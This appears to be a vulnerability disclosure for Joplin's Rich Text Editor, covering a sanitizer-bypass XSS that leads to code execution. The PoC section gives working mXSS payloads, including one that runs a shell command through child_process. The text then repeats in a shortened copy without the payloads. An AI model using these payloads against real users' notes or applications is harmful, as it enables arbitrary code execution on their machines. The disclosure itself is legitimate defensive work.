Summary
An XSS vulnerability allows arbitrary code execution from the Rich Text Editor.
Details
The vulnerability is caused by differences between how Joplin's HTML sanitizer handles comments and how the browser handles comments. This affects both the Rich Text Editor and the Markdown viewer. However, unlike the Rich Text Editor, the Markdown viewer is cross-origin isolated, which prevents JavaScript from directly accessing functions/variables in the toplevel Joplin window.
This issue is not present in Joplin 3.1.24 and may have been introduced in 9b50539.
PoC
- Create a note with the following Markdown:
<!-- Based on a sample from https://github.com/SonarSource/mxss-cheatsheet/blob/master/examples.md -->
XSS 1:
<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
XSS 2:
<!--a foo=--!><img src=x onerror="alert(2);top.require('child_process').exec('ls -la', (err, stdout) => {document.body.innerText = stdout})"><!--<a>">
- Switch to the Rich Text Editor.
- Observe that alert dialogs showing "1" then "2" are shown.
- Observe that the editor contains the output of
ls -la.
Impact
This is an XSS vulnerability that impacts users that open untrusted notes in the Rich Text Editor.
personalizedrefrigerator Reporter
Summary
An XSS vulnerability allows arbitrary code execution from the Rich Text Editor.
Details
The vulnerability is caused by differences between how Joplin's HTML sanitizer handles comments and how the browser handles comments. This affects both the Rich Text Editor and the Markdown viewer. However, unlike the Rich Text Editor, the Markdown viewer is cross-origin isolated, which prevents JavaScript from directly accessing functions/variables in the toplevel Joplin
window.This issue is not present in Joplin 3.1.24 and may have been introduced in 9b50539.
PoC
ls -la.Impact
This is an XSS vulnerability that impacts users that open untrusted notes in the Rich Text Editor.